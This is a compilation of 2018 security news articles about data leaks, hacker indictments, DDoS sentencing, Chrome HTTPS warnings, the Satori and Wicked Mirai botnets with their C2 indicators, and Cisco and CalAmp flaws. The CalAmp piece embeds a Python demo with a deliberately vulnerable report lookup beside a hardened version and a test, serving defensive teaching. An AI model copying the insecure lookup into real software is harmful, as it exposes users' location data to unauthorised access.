The dataset contains “at least 200 million lines of data from a possible range of 11 to 50 Japanese websites,” and FireEye discovered that the data is highly varied and not available through publicly available data sources.

Furthermore, analysis of the leak suggested that much of the data was genuine, given that most of the email addresses out of a random sample of 200,000 were previously seen in major leaks, thus unlikely to have been fabricated.

“Since we did not observe most of the leaked data in any dataset as coming from one specific leak or on any publicly available website, this also indicates that the actor is unlikely to have bought or scraped the information from data leaks and resold it as a new product,” FireEye explains.

In another sample of 190,000 credentials, 36% contained duplicate values, the researchers say. Furthermore, a significant number of fake email addresses were observed, suggesting that the actual number of real, unique credentials and sets of PII is lower than advertised.

Filenames in the dataset included “a Japanese food brand, an unnamed online handbag shop, an unnamed adult website, an unnamed shipping company, a gaming website, a beauty company, and other references,” the researchers reveal.

The exfiltrated data includes information usually associated with websites with customer login and profile information, and the actor appears to have had access only to data normally stored on servers connected to a website or web portal.

What the security researchers couldn’t verify, however, was that the exfiltrated data indeed came from the claimed sources. The actor might have labeled the files in the data leak using the names of Japanese websites, but the researchers believe the individual had little incentive to falsify the data sources.

The hacker appears to have been actively selling website databases on Chinese underground forums since at least 2013 and FireEye experts found two personas likely tied to the individual through a common QQ address connected to a person living in China’s Zhejiang province.

The actor was observed selling data stolen from websites in China, Taiwan, Hong Kong, European countries, Australia, New Zealand, and North American countries.

However, because the actor has a “significant portion of negative reviews on underground forums,” the sold information could be fabricated or might have been sold before. The negative reviews claimed that the individual either did not deliver data or did not provide the expected product.

“Since much of this information has been previously leaked in large-scale data leaks, as well as the possibility that it has been previously sold, we anticipate that this dataset will not enable new large scale malicious activity against targeted entities or individuals with leaked PII,” FireEye says.


More Charges Against 'Syrian Electronic Army' Hackers
19.5.2018 securityweek  BigBrothers

The U.S. Justice Department on Thursday announced more charges against two Syrian nationals believed to be members of the “Syrian Electronic Army” hacker group.

Ahmad ‘Umar Agha, 24, known online as “The Pro,” and Firas Dardar, 29, known online as “The Shadow,” have been indicted on 11 counts of conspiracy to commit computer fraud, conspiracy to commit wire fraud, and aggravated identity theft.

The charges stem from spear-phishing attacks allegedly launched by the men against a wide range of government and private organizations, including the Executive Office of the President, the Marine Corps, NASA, Human Rights Watch, and a long list of media companies, such as CNN, Reuters, National Public Radio, The Washington Post, The New York Times, the Associated Press, The Onion, Time, USA Today, and The New York Post.

The goal of the phishing attacks was to help the hackers obtain usernames and passwords, which they could use to deface websites, redirect the visitors of the targeted site to their own domains, steal emails, and hijack social media accounts.

Authorities pointed out that the computer fraud and wire fraud conspiracy charges carry maximum terms of 5 and 20 years in prison, respectively, while the aggravated identity theft charges carry up to 18 years in prison.

The men were previously charged in 2014 – the criminal complaints were only unsealed in 2016 – alongside Peter “Pierre” Romar, who had been residing in Germany. Romar was arrested and pleaded guilty to hacking and extortion charges in September 2016.

Ahmad ‘Umar Agha and Firas Dardar are still at large and are believed to be residing in Syria. They are on the FBI’s Cyber Most Wanted list, with a reward of up to $100,000 being offered for information leading to their arrest.

The new indictment comes as the five-year statute of limitations for some of the crimes they were previously charged for is about to expire.


Man Sentenced to 15 Years in Prison for DDoS Attacks, Firearm Charges
19.5.2018 securityweek  Crime

A New Mexico man has been sentenced to 15 years in prison for launching distributed denial-of-service (DDoS) attacks on dozens of organizations and for firearms-related charges.

John Kelsey Gammell, 55, used several so-called booter services to launch cyberattacks, including VDoS, CStress, Inboot, Booter.xyz, and IPStresser. His targets included former employers, business competitors, companies that refused to hire him, colleges, law enforcement agencies, courts, banks, and telecoms firms.

Gammell took measures to avoid exposing his real identity online, including through the use of cryptocurrencies to pay for the DDoS attacks and VPNs. However, a couple of taunting emails he sent to his victims during the DDoS attacks – asking if they had any IT issues he could help with – were sent from Gmail and Yahoo addresses that had been accessed from his home IP address.

The man initially rejected a plea deal and his attorney sought the dismissal of the case, but in January he pleaded guilty to one count of conspiracy to commit intentional damage to a protected computer and two counts of being a felon-in-possession of a firearm. Gammell, a convicted felon, admitted having numerous firearms and hundreds of rounds of ammunition.

In addition to the 180-month prison sentence, Gammell will have to pay restitution to victims of his DDoS attacks, but that amount will be determined at a later date.


Chrome to Issue Red "Not Secure" Warning for HTTP
19.5.2018 securityweek  Security

Google is putting yet another nail in the HTTP coffin: starting with Chrome 70, pages that are not served over a secure connection will be marked with a red warning.

The search giant has been pushing for an encrypted web for many years, and suggested in 2014 that all HTTP sites be marked as insecure.

Google proposed that Chrome would initially mark HTTP pages serving password fields or credit card interactions as “Not Secure,” and only then move to marking all of them in a similar manner.

Now, Google believes that the Chrome security indicators should evolve in line with a wider adoption of HTTPS across the Internet.

At the beginning of May 2018, over 93% of the traffic across Google resources was being served over an encrypted connection, a major improvement since early 2014, when only 50% of the traffic was encrypted.

Similar advancements were observed across the web as well, where around three quarters of the pages loaded via Chrome at the end of last week were served over HTTPS. Three years ago, only around 40% of the loaded pages were using HTTPS.

Given the wider adoption of HTTPS, Google is now ready to make another push towards eliminating unencrypted connections by marking HTTP pages with a red “Not Secure” warning.

“Previously, HTTP usage was too high to mark all HTTP pages with a strong red warning, but in October 2018 (Chrome 70), we’ll start showing the red “not secure” warning when users enter data on HTTP pages,” Emily Schechter, Product Manager, Chrome Security, notes in a blog post.

This, however, is only one of the major changes Google is making to Chrome’s security indicators: Chrome 69 will also remove the (green) “Secure” wording and the HTTPS scheme in September 2018.

“Users should expect that the web is safe by default, and they’ll be warned when there’s an issue. Since we’ll soon start marking all HTTP pages as ‘not secure’, we’ll step towards removing Chrome’s positive security indicators so that the default unmarked state is secure,” Schechter notes.

Google isn’t the only Internet company to be pushing for the adoption of HTTPS: WordPress started offering free HTTPS to all hosted websites, Let’s Encrypt provides free HTTPS certificates, and Amazon is offering free security certificates to AWS customers.

Since last year, Firefox has also been warning users when web pages serve login fields over an insecure HTTP connection.

As of May 1, Chrome is also displaying a warning when encountering a publicly-trusted certificate (DV, OV, and EV) issued after April 30 that is not compliant with the Chromium Certificate Transparency (CT) Policy.

“We hope these changes continue to pave the way for a web that’s easy to use safely, by default. HTTPS is cheaper and easier than ever before, and unlocks powerful capabilities -- so don’t wait to migrate to HTTPS,” Schechter concludes.


Misconfigured CalAmp Server Enabled Vehicle Takeover
19.5.2018 securityweek  Security

A misconfigured server operated by CalAmp, a company offering the backend for a broad range of well-known car alarm systems, provided anyone with access to data and even allowed for account and vehicle takeover.

The issue was discovered by security researchers Vangelis Stykas and George Lavdanis, while looking for issues in the Viper SmartStart system, which allows users to remotely start, lock, unlock, or locate their vehicles directly from their smartphones.

The researchers found that the application uses an SSL connection with certificate pinning to prevent tampering.

However, the application also connected to the Calamp.com Lender Outlook service, where login was possible using the credentials from the Viper app.

“This was a different panel which seemed to be targeted to the companies that have multiple sub-accounts and a lot of vehicles so that they can manage them,” Stykas notes.

While everything on the domain was correctly secured, the researchers then discovered that the reports were delivered by another server running TIBCO JasperReports software. After removing all request parameters there, the researchers found they were logged in as a user with limited rights but with access to a variety of reports.

“We had to run all those reports for our vehicles right? Well the ids for the user was passed automatically from the frontend but now we had to provide them from the panel as an input. And…well...we could provide any number we wanted,” the researcher explains.

The server not only provided access to all the reports for all the vehicles, including location history, but also included data sources with usernames (although the passwords were masked). Furthermore, the server allowed for the copying and editing of existing reports, meaning that an attacker could add arbitrary XSS to steal information.

With all production databases present on the server, including CalAmp connect device outlook, the researchers then discovered that it was possible to take over a user account via the mobile application, as long as an older password for the account was known. From the application, it is then possible to manipulate the connected device, in this case a vehicle.

Basically, an attacker who knows an old password for an account can change the current password to the old one, then simply walk to the car, unlock it, start the engine, and possibly steal the vehicle.

The vulnerability also allows an attacker to retrieve a list of all users and location reports on users, or start a vehicle’s engine whenever they want. They could also “get all the IoT devices from connect database or reset a password there and start poking around,” the researcher notes.

The researchers reported the issue to CalAmp in the beginning of May 2018, and the company resolved the bug within 10 days of receiving the report. They also updated their website to make it easier for security researchers to report any other vulnerabilities they discover in the company’s products.
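The core flaw in both CalAmp write-ups above is the same: the reporting server accepted whatever vehicle or user id the client supplied without checking that the authenticated account owned it, so any id returned the corresponding report. The block below is an added example, not CalAmp's or TIBCO's code: it models a minimal report service with the vulnerable lookup next to a hardened one, using constructed account names, vehicle ids and report contents, and includes the kind of authorization regression test a defender would run against their own endpoint.

```python
"""Report access with and without an ownership check.

Added example illustrating the JasperReports finding above; it is not
CalAmp's or TIBCO's code.  Account names, vehicle ids and report contents
are constructed sample data.
"""

# Constructed sample data: vehicles per account and per-vehicle reports.
VEHICLE_OWNERS = {
    "alice": {"VH-1001", "VH-1002"},
    "bob": {"VH-2001"},
}
REPORTS = {
    "VH-1001": ["2018-05-01 08:00 parked, lot A", "2018-05-01 18:02 driving"],
    "VH-1002": ["2018-05-02 09:10 parked, lot B"],
    "VH-2001": ["2018-05-03 07:45 driving"],
    "VH-3001": ["2018-05-04 12:00 parked, depot"],   # owned by no account in this sample
}


class Forbidden(Exception):
    """The authenticated account is not authorised for the requested object."""


def report_vulnerable(user, vehicle_id):
    """Insecure: the caller is authenticated, but the vehicle id it supplies
    is trusted as-is, so any report can be fetched (an insecure direct
    object reference, the behaviour described in the articles above)."""
    return REPORTS[vehicle_id]


def report_hardened(user, vehicle_id):
    """Secure: the vehicle id must be one the authenticated account owns.
    The ownership lookup happens server-side; the supplied id is never
    trusted on its own."""
    if vehicle_id not in VEHICLE_OWNERS.get(user, set()):
        # Same error for "not yours" and "does not exist", so the endpoint
        # cannot be used to enumerate which ids are valid.
        raise Forbidden(f"{user} may not read reports for {vehicle_id}")
    return REPORTS[vehicle_id]


def authorization_regression(fetch, user, candidate_ids):
    """Defensive regression test: return the ids for which `fetch` hands
    back data the account does not own.  Run it against your own endpoint
    in CI; an empty list is the expected result."""
    owned = VEHICLE_OWNERS.get(user, set())
    leaked = []
    for vid in candidate_ids:
        try:
            fetch(user, vid)
        except (Forbidden, KeyError):
            continue
        if vid not in owned:
            leaked.append(vid)
    return leaked


if __name__ == "__main__":
    ids = sorted(REPORTS)
    print("vulnerable leaks:", authorization_regression(report_vulnerable, "bob", ids))
    print("hardened leaks:  ", authorization_regression(report_hardened, "bob", ids))
```

The ownership table is the piece that was missing on the reporting server: the frontend filled in the ids automatically, but nothing on the backend tied them to the session, so the check has to live where the data is served, not in the client.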


F-Secure Unveils New Endpoint Detection & Response Solution
19.5.2018 securityweek  Security

Finland-based cybersecurity firm F-Secure on Thursday announced the launch of a new endpoint detection and response (EDR) solution that combines human expertise and artificial intelligence.

The new offering, F-Secure Rapid Detection & Response, is designed to help organizations protect their IT systems against targeted attacks.

The solution leverages lightweight endpoint sensors and AI-powered data analysis capabilities to monitor devices for malicious activity. Rapid Detection & Response creates a baseline for normal behavior and flags any unusual activity. Suspicious behavior is subjected to additional analysis to prevent false positives that could overwhelm security teams, F-Secure said.

The product can be configured to respond to potential threats in various ways. It can provide guidance to the organization’s IT team or managed service provider on how to respond to an incident, or it can take action automatically in order to contain an attack. More difficult cases can be escalated to a local partner that is trained and supported by F-Secure experts.

Each potential threat is analyzed using a process that F-Secure has named Broad Context Detection, which leverages both human expertise and AI to help organizations validate threats and assess their impact.


“One trick that’s common in modern attacks is to disguise malicious activity as something normal, and attackers are always finding new ways to do this. And since there’s countless numbers of normal things happening in any given environment, it’s basically impossible for companies to rely on human experts or artificial intelligence alone to comb through all that data,” explained F-Secure Chief Technology Officer Mika Stahlberg.

“Artificial intelligence trained by the best cyber security experts is vital when you’re looking for needles in a digital haystack, and in the right hands, it’s able to keep defenders a step ahead of even the most skilled, highly motivated attackers,” Stahlberg added.

F-Secure Rapid Detection & Response is available through the security firm’s network of authorized partners. The solution can be managed directly by an organization’s IT department or it can be used as a managed service from one of F-Secure’s partners.


A New Mexico man sentenced to 15 Years in jail for DDoS Attacks and possession of firearms
19.5.2018 securityaffairs Crime

A New Mexico man admitted being responsible for DDoS attacks against the websites of former employers, business competitors, and public services.
John Kelsey Gammell, 55, from New Mexico, has been sentenced to 15 years in prison for launching distributed denial-of-service (DDoS) attacks on dozens of organizations and for firearms-related charges.

The man used several popular DDoS-for-hire services, including VDoS, CStress, Inboot, Booter.xyz, and IPStresser, to launch attacks against his victims.

The list of victims is long and includes business competitors, former employers, law enforcement agencies, courts, banks, telecoms companies, and firms that refused to hire him.

The man used VPN services to hide his identity and cryptocurrency for his payments, but he was identified because of poor operational security. He sent emails to the victims while they were under DDoS attack, offering his services to mitigate the problems; the emails were sent from Gmail and Yahoo accounts he accessed from his home without masking his real IP address.


The man initially rejected a plea deal, but in January he pleaded guilty to one count of conspiracy to commit intentional damage to a protected computer, admitting to launching DDoS attacks on websites in the United States between July 2015 and March 2017. He also pleaded guilty to two counts of being a felon in possession of firearms and ammunition.

The man was sentenced to 180 months in prison and will have to pay restitution to the victims of his DDoS attacks; the amount will be determined at a later date.


Satori Botnet is targeting exposed Ethereum mining pools running the Claymore mining software
19.5.2018 securityaffairs BotNet

While a new variant of the dreaded Mirai botnet, the so-called Wicked Mirai, has emerged in the wild, the operators of the Satori Mirai variant also appear to be very active.

Experts observed hackers using the Satori botnet to mass-scan the Internet for exposed Ethereum mining pools; the bots are scanning for devices with port 3333 exposed online.

Port 3333 is commonly used for remote management by a large amount of cryptocurrency-mining equipment.

The activities were reported by several research teams, including Qihoo 360 Netlab, SANS ISC, and GreyNoise Intelligence.

360 Netlab
@360Netlab
Do you see port 3333 scan traffic going up? Satori botnet is scanning it now, see our Scanmon trend https://scan.netlab.360.com/#/dashboard?tsbeg=1525536000000&tsend=1526140800000&dstport=3333&toplistname=srcip&topn=10&sortby=sum …, and try a dns lookup for one of the control domain it is using now, dig any http://c.sunnyjuly.gq , I personally like yesterday's TXT result more

8:32 PM - May 11, 2018

Since May 11, experts have been observing a spike in the activity of the Satori botnet.

According to the researchers at GreyNoise, the threat actors are focused on equipment running the Claymore mining software: once the attackers find a server running this software, they push instructions that force the device to join the ‘dwarfpool’ mining pool using an ETH wallet controlled by the attackers.

GreyNoise Intelligence
@GreyNoiseIO
12 May
GreyNoise observed a large spike of TCP port 3333 scan traffic today. This is the default port for the "Claymore" dual Ethereum/Decred cryptocurrency miner. pic.twitter.com/5g6vVbPLNq

GreyNoise Intelligence
@GreyNoiseIO
Once the attacker identifies a server running the Claymore software they push instructions to reconfigure the device to join the "dwarfpool" mining pool and use the attacker's ETH wallet (https://etherscan.io/address/0xd0897da92bd7d7754f4ea18f8169dbc08beb8df7 …) pic.twitter.com/0IVo7CKsjf

12:43 AM - May 12, 2018

The experts noticed that most of the devices involved in the mass scanning are compromised GPON routers located in Mexico.

The experts monitored five botnets using the compromised GPON routers to scan for Claymore miners; one of them is the Satori botnet, which is leveraging an exploit in the attack.

GreyNoise Intelligence
@GreyNoiseIO
12 May
Replying to @GreyNoiseIO
Effective 6:43 PM EST the attacker has only mined ~$200 worth of ETH

GreyNoise Intelligence
@GreyNoiseIO
Interestingly, 95% of the devices scanning for port 3333 today are located in the same residential ISP in Mexico (https://twitter.com/Telmex ) as the majority of the hosts affected by the GPON vulnerability disclosed earlier this week. https://twitter.com/GreyNoiseIO/status/994486111178252288 …

12:45 AM - May 12, 2018

GreyNoise Intelligence
@GreyNoiseIO
GreyNoise has observed ~13,000 compromised home routers probing the Internet for the '/GponForm/diag_Form' URI over the past 96 hours, likely related to the weaponization of CVE-2018-10561. Most devices are located in the "Uninet" ISP in Mexico.

Ref: https://github.com/f3d0x0/GPON

9:55 AM - May 10, 2018

Below are the details of the five botnets published by Netlab 360:

Satori: Satori is the infamous variant of the mirai botnet.
We first observed this botnet coming after the GPON vulnerable devices at 2018-05-10 05:51:18, several hours before our last publish.
It has quickly overtaken muhstik as the No.1 player.
Mettle: A malicious campaign based on IP addresses in Vietnam (C2 210.245.26.180:4441, scanner 118.70.80.143) and mettle open source control module
Hajime: Hajime pushed an update which adds the GPON’s exploits
Two Mirai variants: At least two malicious branches are actively exploiting this vulnerability to propagate mirai variants. One of them has been called omni by newskysecurity team.
imgay: This appears like a botnet that is under development. Its function is not finished yet.

“In our previous article, we mentioned since this GPON Vulnerability (CVE-2018-10561, CVE-2018-10562 ) announced, there have been at least five botnets family mettle, muhstik, mirai, hajime, satori actively exploit the vulnerability to build their zombie army in just 10 days.” reads a blog post published by Netlab 360.

“From our estimate, only 2% of all GPON home routers are affected, most of which are located in Mexico.”

“The source of this scan is about 17k independent IP addresses, mainly from Uninet SA de CV, telmex.com, located in Mexico.”

Researchers at SANS ISC who analyzed the Satori botnet activity discovered that the bot is currently exploiting CVE-2018-1000049, a remote code execution flaw that affects the Nanopool Claymore Dual Miner software.

The experts noted that proof-of-concept code for the CVE-2018-1000049 vulnerability is publicly available online.

“The scan is consistent with a vulnerability, CVE 2018-1000049, released in February [2]. The JSON RPC remote management API does provide a function to upload “reboot.bat”, a script that can then be executed remotely. The attacker can upload and execute an arbitrary command using this feature.” reads the analysis published by the SANS ISC.

“The port the API is listening on is specified when starting the miner, but it defaults to 3333. The feature allows for a “read-only” mode by specifying a negative port, which disables the most dangerous features. There doesn’t appear to be an option to require authentication.”


"Wicked" Variant of Mirai Botnet Emerges

18.5.2018 securityweek  BotNet

A new variant of the Mirai Internet of Things (IoT) botnet has emerged which features new exploits in its arsenal and distributes a new bot, Fortinet researchers warn.

Called Wicked, based on strings found in the code, the malware has added three new exploits compared to Mirai and appears to be the work of the same developer behind other Mirai variants.

The Mirai botnet was first spotted in the third quarter of 2016, when it fueled some of the largest distributed denial of service (DDoS) attacks at the time. The malware’s source code was leaked online in October 2016, and numerous variants have been observed ever since: Masuta, Satori, Okiru, and others.

Similar to other botnets based on Mirai, the newly discovered Wicked iteration contains three main modules: Attack, Killer, and Scanner. Unlike Mirai, however, which used brute force to gain access to vulnerable IoT devices, Wicked uses known and available exploits, many of which are already old, the security researchers discovered.

Wicked would scan ports 8080, 8443, 80, and 81 by initiating a raw socket SYN connection to the target device. Upon establishing a connection, the malware attempts to exploit the device and upload a payload to it by writing the exploit strings to the socket.

The exploit used depends on the port on which the connection was established. On port 8080, the malware uses Netgear DGN1000 and DGN2200 v1 router exploits (also used by the Reaper botnet); on port 81 it uses a CCTV-DVR remote code execution exploit; on port 8443 a Netgear R7000 and R6400 command injection (CVE-2016-6277); and on port 80 an invoker shell on compromised web servers.

Wicked contains the string SoraLOADER, which initially suggested it might attempt to distribute the Sora botnet. Instead, the researchers discovered that the malware would actually connect to a malicious domain to download the Owari bot, a different Mirai variant.

Although the website was confirmed to have distributed Owari, the security researchers couldn’t retrieve bot samples from the website directory. Furthermore, they discovered that the samples had been replaced by another malware family, the Omni bot.

Looking through the website’s /bins directory, the security researchers discovered other Omni samples, which were apparently delivered using the Gigabit-capable Passive Optical Network (GPON) vulnerability CVE-2018-10561.

While looking for the connections between Wicked, Sora, Owari, and Omni, the security researchers found an April interview with the developer behind Sora and Owari, who goes by the online handle of “Wicked” himself. At the time, the malware author said that Sora was abandoned, but work on Owari would continue, with no new projects planned.

Based on their findings and the malware author's statements, Fortinet believes that both the Sora and Owari bots have been abandoned and that Omni is the developer's current project.

“Based on the author’s statements in the above-mentioned interview as to the different botnets being hosted in the same host, we can essentially confirm that the author of the botnets Wicked, Sora, Owari, and Omni are one and the same. This also leads us to the conclusion that while the WICKED bot was originally meant to deliver the Sora botnet, it was later repurposed to serve the author’s succeeding projects,” Fortinet concludes.


Net Neutrality: Party Politics and Consumer Concerns
18.5.2018 securityweek  BigBrothers

Net neutrality in the U.S. is a bi-partisan issue being fought in a very partisan manner. It was introduced during the Obama years and abandoned by the Trump-appointed FCC chairman Ajit Pai. Sen. Edward Markey, D-Mass., filed a procedural petition that would allow a debate on overturning the FCC ruling via the Congressional Review Act. To succeed, this would require the support of the Senate, followed by a vote in the House, and finally the agreement of the president.

The Senate voted Wednesday and the first hurdle has been overcome. The motion needed a simple majority of 51 votes. The Democrats were confident: there are 49 Democrats in the Senate, Sen. Susan Collins, R-Maine, had promised support, and Sen. John McCain, R-Ariz., was absent through illness, providing a basic majority.

In the event, the Senate voted by 52 to 47 to open the debate. Three Republicans joined with Democrats: Sen. Susan Collins of Maine, Sen. John Kennedy of Louisiana and Sen. Lisa Murkowski of Alaska. The debate will now go to the House of Representatives, but it is unlikely to go any further. Republicans dominate the House -- and in the unlikely event they agree to re-instate net neutrality, it will almost certainly not be accepted by President Trump.

Right now, net neutrality is, and is likely to remain, dead along purely partisan political lines. But outside of Washington it is not a partisan issue. Sen. Markey points out in a tweet that 82% of Republicans, 90% of Democrats, and 86% of all Americans support the concept of net neutrality (statistics from the Program for Public Consultation at the University of Maryland).

The issue can be characterized as universal, equal and full access to the internet versus a more efficient and better managed internet. Net neutrality holds that the internet should be equally accessible by and to everyone, always. Opponents hold that some control by the communications companies, particularly the ability to set differential prices, will lead to greater investment in the internet infrastructure and better broadband. The problem with the latter argument is that the communications companies have a history of using such powers to their own benefit and at the cost of others.

"Make no mistake," warns Sean McGrath, online privacy expert at BestVPN; "the abolition of net neutrality will erode the democratic fabric that binds the Internet together. It will allow internet service providers and cable companies to dictate the winners and losers in the digital world and it will give a very small number of market players near-limitless power, stifling the rights of citizens that cannot afford to play by their rules."

The fear is that ISPs will block or slow down selected services unless the user pays a premium.

Francis Dinha, CEO and co-founder of the open source VPN protocol OpenVPN, believes that many companies will be forced to re-evaluate their business models since consumers are unlikely to pay for services that have traditionally been free.

"With this in mind," he comments, "there are solutions for users to get around blocking or slowdown. Marketers can use a VPN service that supports strong encryption and good obfuscation techniques to circumvent any slowdown or blocking of any public internet service. It will be very difficult for ISPs to slow down or block a VPN service that supports advanced obfuscation techniques." Note that the VPN industry is likely to be the major non-ISP beneficiary of the end of net neutrality.

There are also specific security concerns over the demise of net neutrality. One is a potential increase in fraudulent activity. If users are forced to pay for better services, the paid accounts will more likely be shared among family and friends. Once they are shared, they are more likely to be stolen by hackers.

"Up to 25 percent of video streaming subscribers share passwords," explains Vanita Pandey, VP of strategy and product marketing at ThreatMetrix. "If the end of net neutrality results in the sluggish Netflix experiences some predict, friends and family will pass around credentials for the fastest broadband account, which will inevitably get posted online, where they'll join more than 9 billion other stolen credentials -- names, addresses, passwords, PIN codes and more -- available to fraudsters on the dark web. As it stands, wayward login credentials will cost streaming companies $650 million in lost potential revenue this year. Across all industries, cybercrime fueled by stolen identity credentials will result in global losses of $3 trillion or more."

After Wednesday's vote, net neutrality activists are jubilant. "This is a historic victory for the free and open Internet, and a major step forward for the future of free expression and democracy," announced Evan Greer, deputy director of Fight for the Future. The reality, however, is that this vote will probably have no ultimate effect on the FCC's ruling against net neutrality -- that would probably require a change in the political landscape before any legislation cements the process.

This is now a purely partisan political issue -- and the only real beneficiary of Wednesday's vote is the Democratic party. The debate now goes to the House of Representatives, where net neutrality will almost certainly be confirmed as dead. But with so much consumer support, Democrats will hope that voters will punish Republican politicians who go against their wishes in the upcoming mid-term elections.


U.S. Energy Department Unveils Multiyear Cybersecurity Plan
18.5.2018 securityweek  Cyber

The U.S. Department of Energy this week announced its strategy to reduce cyber risks in the energy sector and outlined its goals, objectives and activities for the next five years.

With the energy sector increasingly targeted by threat actors, the Energy Department is concerned that attackers may be able to cause a large and prolonged energy disruption. In an effort to improve the cybersecurity and resilience of energy services, the agency has created the DOE Multiyear Plan for Energy Sector Cybersecurity, which is meant to provide a foundation for the recently launched Office of Cybersecurity, Energy Security, and Emergency Response (CESER).

The plan focuses on three main goals: strengthening cybersecurity preparedness, coordinating incident response and recovery, and accelerating research, development and demonstration (RD&D) for resilient energy delivery systems (EDS).

When it comes to strengthening preparedness, the DOE’s objectives include enhancing information sharing and situational awareness capabilities, strengthening risk management capabilities, reducing supply chain vulnerabilities, and developing and improving information sharing tools. This last objective includes the development of a virtual crowdsourced malware forensic analysis platform.

As for incident response and recovery, the Energy Department wants to establish a coordinated national incident response capability, conduct training for emergency responders and improve the incident reporting process, and conduct exercises.

The DOE’s third goal is to accelerate “game-changing RD&D” of resilient EDS, including for detecting, preventing and mitigating cyber incidents. The organization also wants tools and technologies that can anticipate future attack scenarios, and the development of systems and components that are cybersecurity-aware and capable of automatically handling cyberattacks.

“The DOE will be updating the Cybersecurity Capability Maturity Model (C2M2). The market has changed since it was published in February 2014,” commented Michael Magrath, director of global regulations & standards at VASCO Data Security. “We anticipate DOE will incorporate NIST’s Digital Identity Guidelines (SP 800-63-3), refreshed in 2017 and advance risk-based, biometric adaptive authentication technologies to protect the nation’s energy sector.”

“We welcome the DOE raising awareness around critical threats to the energy sector and laying out a strategy,” said Ray DeMeo, COO at Virsec. “While the strategy pillars are sound, making them actionable will be challenging - largely in view of the inertia behind legacy systems. It's critical that we invest with speed and agility, and the roadmap’s goal to accelerate game-changing RD&D of resilient systems stands out. The administration’s funding request for $96 million is hopefully just a down payment, because protecting our infrastructure adequately will cost billions.”


Critical Flaws in Cisco DNA Center Allow Unauthorized Access
18.5.2018 securityweek  Vulnerebility

Cisco has found and patched three critical unauthorized access vulnerabilities in its Digital Network Architecture (DNA) platform.

Cisco DNA is a solution that helps enterprises automate network operations, making it easy to design, provision and apply policies across their environments.

Cisco discovered that the DNA Center is impacted by three serious flaws. One of them, CVE-2018-0222, is related to the existence of undocumented static credentials for the default admin account.

A remote attacker could leverage these credentials to gain access to the affected system and execute commands with root privileges. The issue has been addressed with the release of Cisco DNA Center software version 1.1.3.

The second vulnerability, CVE-2018-0271, allows a remote attacker to bypass authentication and obtain privileged access to critical services in the DNA Center. This flaw has been patched with the release of Cisco DNA Center software version 1.1.2.

“The vulnerability is due to a failure to normalize URLs prior to servicing requests. An attacker could exploit this vulnerability by submitting a crafted URL designed to exploit the issue,” Cisco explained in an advisory.

The third critical security hole in DNA Center, CVE-2018-0268, also allows a remote attacker to bypass authentication and obtain elevated privileges. A patch is included in version 1.1.3.

“This vulnerability is due to an insecure default configuration of the Kubernetes container management subsystem within DNA Center,” Cisco said. “An attacker who has the ability to access the Kubernetes service port could execute commands with elevated privileges within provisioned containers. A successful exploit could result in a complete compromise of affected containers.”

All the vulnerabilities were discovered by Cisco itself and there is no evidence of malicious exploitation.

Cisco published more than a dozen security advisories on Wednesday, including four that describe high severity vulnerabilities.

The list includes a cross-site request forgery (CSRF) flaw in IoT Field Network Director (IoT-FND), a denial-of-service (DoS) bug in the Identity Services Engine (ISE), a shell access vulnerability in Enterprise NFV Infrastructure Software (NFVIS), and a DoS problem in Meeting Server.


DHS Publishes New Cybersecurity Strategy
18.5.2018 securityweek  BigBrothers

The U.S. Department of Homeland Security (DHS) this week published its long-delayed Cybersecurity Strategy. It had been mandated by Congress to deliver a strategy by March 2017, and did so on May 15, 2018.

The strategy is defined in a high-level document (PDF) of 35 pages. Its scope is to provide "the Department with a framework to execute our cybersecurity responsibilities during the next five years to keep pace with the evolving cyber risk landscape by reducing vulnerabilities and building resilience; countering malicious actors in cyberspace; responding to incidents; and making the cyber ecosystem more secure and resilient."

This framework comprises five pillars containing seven separate goals. The pillars are risk identification; vulnerability reduction (including the twin goals of protecting federal systems and critical industries); threat reduction by proactive means; consequence mitigation (that is, improved incident response); and enabling cybersecurity outcomes. The last pillar comprises the twin goals of strengthening the security and reliability of the cyber ecosystem, and improving the management of the department's own activities.

"The cyber threat landscape is shifting in real-time, and we have reached a historic turning point," said DHS Secretary Kirstjen Nielsen. "Digital security is now converging with personal and physical security, and it is clear that our cyber adversaries can now threaten the very fabric of our republic itself. That is why DHS is rethinking its approach by adopting a more comprehensive cybersecurity strategy. In an age of brand-name breaches, we must think beyond the defense of specific assets -- and confront systemic risks that affect everyone from tech giants to homeowners. Our strategy outlines how DHS will leverage its unique capabilities on the digital battlefield to defend American networks and get ahead of emerging cyber threats."

Of necessity, however, the five pillars and seven goals are defined in very basic terms. They define objectives, sub-objectives and outcomes -- but with little on methods. For example, goal #1 (the risk identification pillar) is to assess evolving cybersecurity risks. This will be achieved by working with "stakeholders, including sector-specific agencies, nonfederal cybersecurity firms, and other federal and nonfederal entities, to gain an adequate understanding of the national cybersecurity risk posture, analyze evolving interdependencies and systemic risk, and assess changing techniques of malicious actors."

However, nobody was able to predict, detect or prevent Russian meddling in the 2016 presidential election, nor the WannaCry and NotPetya outbreaks. The implication is that something new and beyond just increased interagency cooperation needs to be done to achieve genuine risk identification.

The third pillar, threat reduction together with goal #4 (prevent and disrupt criminal use of cyberspace) is also interesting. The strategy states, "We will reduce cyber threats by countering transnational criminal organizations and sophisticated cyber criminals." Again, the obvious question is, 'How?'. The strategy states, "our law enforcement jurisdiction is broad". But it does not reach into those countries that are generally considered to be the prime movers of serious cyber criminality: Russia, China, Iran and North Korea.

Indeed, the U.S. government has so far failed to repatriate Edward Snowden from Russia, nor even to apprehend Julian Assange in the European Union. It is difficult to see how the DHS will be able to prevent and disrupt advanced foreign criminal use of cyberspace without resorting to new tactics -- such as a more aggressive active defense verging on hacking back. Neither 'active defense' nor 'hack back' are mentioned in the strategy document.

Ray DeMeo, COO at Virsec, has similar concerns. "Cybersecurity is an inherently global issue and it's good that the DHS strategy recognizes the need for a 'global approach with robust international engagement'," he told SecurityWeek. "But it's yet unclear how an agency with a domestic mandate is going to effectively engage globally. The reality is that a large portion of internet crime is driven from the international "wild west" from areas with lax law enforcement, or actual nation-state sponsorship. This problem is as much diplomatic as it is technological."

These caveats aside, it is good to see a formal strategy to cover the DHS' entire theater of responsibility with a clearly stated objective: "By 2023, the Department of Homeland Security will have improved national cybersecurity risk management by increasing security and resilience across government networks and critical infrastructure; decreasing illicit cyber activity; improving responses to cyber incidents; and fostering a more secure and reliable cyber ecosystem through a unified departmental approach, strong leadership, and close partnership with other federal and nonfederal entities."

"The strategy put forth by DHS is very comprehensive and well thought out," says Rishi Bhargava, co-founder at Demisto. "The inclusion of response plan coordination under the Consequence Mitigation section is a critical piece to be able to contain damage from an attack. Any strategy is as good as its execution. I look forward to seeing this put in action across different departments and policies."

